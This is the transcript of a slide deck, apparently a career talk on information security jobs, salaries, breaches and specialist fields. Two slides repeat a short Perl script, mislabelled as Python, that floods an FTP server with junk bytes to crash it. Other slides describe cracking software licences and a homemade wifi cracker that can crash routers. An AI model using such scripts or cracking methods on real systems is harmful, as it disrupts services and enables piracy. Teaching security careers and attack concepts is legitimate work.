Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
-
Upload
nipun-jaswal -
Category
Education
-
view
1.096 -
download
3
description
Transcript of Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
![Page 1: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/1.jpg)
Life Beyond Ethical Hacking“ The Actual Information Security” By :-Nipun Jaswal (CSA , HCF Info sec Pvt. Ltd. )
![Page 2: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/2.jpg)
Acknowledgements
Dr. H.S JohalMs. Himanshi
![Page 3: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/3.jpg)
Lil About My Self
Certified With C|EH , CISE , AFCEH Associated With over 9 Companies Ambassador , EC-COUNCIL Creator Of India’s Fist DLP on
Web Application Penetration Testing Course Student @ LPU Tested Over 90+ Servers Currently working as Chief Security Analyst at
HCF Infosec Pvt. Ltd
![Page 4: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/4.jpg)
Lets Go Old School ,What is Ethical Hacking?
Breaking Into Devices , Networks Legally.
Securing Servers, Recovering Emails etc. But the Question Remains !
Where to get these jobs ?
![Page 5: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/5.jpg)
Jobs And Stats
![Page 6: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/6.jpg)
Why More Jobs and Less People ?
Emerging Technology Still Register Work Don’t want to spend money Find it too difficult People Feel they can learn hacking
in 2 days workshop :-P No Proper facilities of required
courses
![Page 7: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/7.jpg)
Salary Packages
Normal B.tech : 300K-400K BPO : 100K-250K DEVELOPMENT : 300K-700K SECURITY : 600K-1300K
![Page 8: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/8.jpg)
Web Application Penetration testing
Exploit Writing Reverse Engineering Malware Analysis Computer Forensics Protocol Analysis
Beyond So Called “Ethical Hacking”
![Page 9: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/9.jpg)
Jobs For Ethical Hacker:- Trainer Trainer Trainer Trainer And Trainer Salary Around : 15K + Incentives
Why To Go Beyond Ethical Hacking?
![Page 10: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/10.jpg)
Jobs For Hackers:- Researchers Technical Heads Penetration testers Forensic Investigators Salary Around: 300-400K Per Month
Jobs Beyond Ethical Hacking:-
![Page 11: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/11.jpg)
Benefits of not Being a Hacker
![Page 12: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/12.jpg)
Benefits of Being a Hacker
I M UR WORST NIGHTMARE :-P
![Page 13: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/13.jpg)
How To Let Your Dreams Come True?
Some Highly Paid Fields :- WAPT – Involves Testing of Web
Applications , Websites , Servers , Source code Auditing .
Exploit Writing – Finding Vulnerabilities in soft wares and Possibly to Exploit the Software .
Reverse Engineering :- Software cracking , Patches , Modifying Features of an end product
![Page 14: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/14.jpg)
How To Let Your Dreams Come True?
Some Highly Paid Fields :- Wireless Testing :- Involves Network
Security infrastructure build up , Managing Networks , System Administration etc.
Projects :- Good At Coding? Show to the whole world .
Forensics : Highest Paid Job in the entire list Takes A lot , And Pays A lot
![Page 15: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/15.jpg)
Why We Need More People ?
Source: Indian Express
![Page 16: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/16.jpg)
Why We Need More People ?
Source: Times Of India
![Page 17: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/17.jpg)
Host Gator Hacked !! 3 Lac Websites Owned By Hackers
Source: SoftPedia
![Page 18: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/18.jpg)
Host Gator Hacked !! 3 Lac Websites Owned By Hackers Contd..
Source: Private
![Page 19: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/19.jpg)
Norton India Hacked !!
Source: Private
![Page 20: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/20.jpg)
Norton India’s Database Hacked !!
Source: Private
![Page 21: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/21.jpg)
Norton India’s Database Hacked !!
Source: Private
![Page 22: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/22.jpg)
The Biggest Of All… Anonymous!!
Source: National Post
![Page 23: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/23.jpg)
Now Beyond The Word ‘Ethical’
Web Application Penetration Testing :-• Find Bugs In Web Applications – Custom Made ,
Open Source Applications .• Bugs which may compromise the security , make it
vulnerable , helps an attacker to steal sensitive information
• Now How To Perform 1 Out of 300 Tests In Web Applications Pen- Test?
• Lets See a Simple Example – SQL Injection Bypass
![Page 24: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/24.jpg)
Rise Of The Web Applications
![Page 25: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/25.jpg)
Fasten Your Seat Belts , Its Showtime
DEMO
![Page 26: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/26.jpg)
Now Beyond The Word ‘Ethical’
Exploit Writing • Potentially writing codes to exploit a
vulnerability .• Highly Paid in Soft wares are vulnerable to
Exploits , which further may lead to compromise of the entire system.
• Requirement : C,C++, Perl , Python , Ruby , Assembly language
![Page 27: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/27.jpg)
Now Beyond The Word ‘Ethical’
Simplest of The Exploit in Python- Crashing A Secure Port FTP Server
use strict;use Socket;my $junk = "\x41" x1000;my $host = shift || ‘192.168.15.1';my $port = shift || 200;my $proto = getprotobyname('tcp');my $iaddr = inet_aton($host);my $paddr = sockaddr_in($port, $iaddr);print "[+] Setting up socket\n";socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";print "[+] Connecting to $host on port $port\n";connect(SOCKET, $paddr) or die "connect: $!";print "[+] Sending payload\n";print SOCKET $junk."\n";print "[+] Payload sent\n";close SOCKET or die "close: $!";
![Page 28: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/28.jpg)
Now Beyond The Word ‘Ethical’
Simplest of The Exploit in Python- Crashing A Secure Port FTP Server
use strict;use Socket;my $junk = "\x41" x1000;my $host = shift || ‘192.168.15.1';my $port = shift || 200;my $proto = getprotobyname('tcp');my $iaddr = inet_aton($host);my $paddr = sockaddr_in($port, $iaddr);print "[+] Setting up socket\n";socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";print "[+] Connecting to $host on port $port\n";connect(SOCKET, $paddr) or die "connect: $!";print "[+] Sending payload\n";print SOCKET $junk."\n";print "[+] Payload sent\n";close SOCKET or die "close: $!";
![Page 29: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/29.jpg)
Now Beyond The Word ‘Ethical’
Prices for Various Exploits
![Page 30: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/30.jpg)
Now Beyond The Word ‘Ethical’
Reverse Engineering• Editing the final software to find serials keys ,
stop the online authentications , • Mostly used by pirates • Sometimes used to edit the features of a final
software • Make your Life easier with free products
![Page 31: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/31.jpg)
Now Beyond The Word ‘Ethical’
Wireless Penetration Testing• Involves Auditing of Network Security Over
Wireless• Installation of Servers And Security Devices • Crack proofing Wireless Passwords • Highly paid • Requires Networking Background
![Page 32: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/32.jpg)
INSANITY WIFI CRACKER
Insanity Wi-fi Cracker • Developed By me and my Friends for minor
project • Automates the cracking of various wifi securities • Performs self MITM attack• DOS Service Can Crash the Routers For Ever :-P• Even an 8 Years old can press the button ‘c’ for
cracking and no. for a particular AP to crack
![Page 33: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/33.jpg)
Wi-fi Cracking At a Click Of a Button
DEMO
![Page 34: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/34.jpg)
So A One Last Question , Wanna go this ?
![Page 35: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/35.jpg)
Or Wanna Go This ?
![Page 36: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/36.jpg)
After AllIt’s your Career
|Handle it with care|
![Page 37: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/37.jpg)
Any Questions ?
![Page 38: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd](https://reader035.fdocuments.us/reader035/viewer/2022062513/5552eb86b4c90584028b468f/html5/thumbnails/38.jpg)
Contact
Email : [email protected]/nipun.jaswalwww.hatcon.inwww.hcf.co.inwww.starthack.comwww.cyber-rog.com/h3llwww.pentest.co.in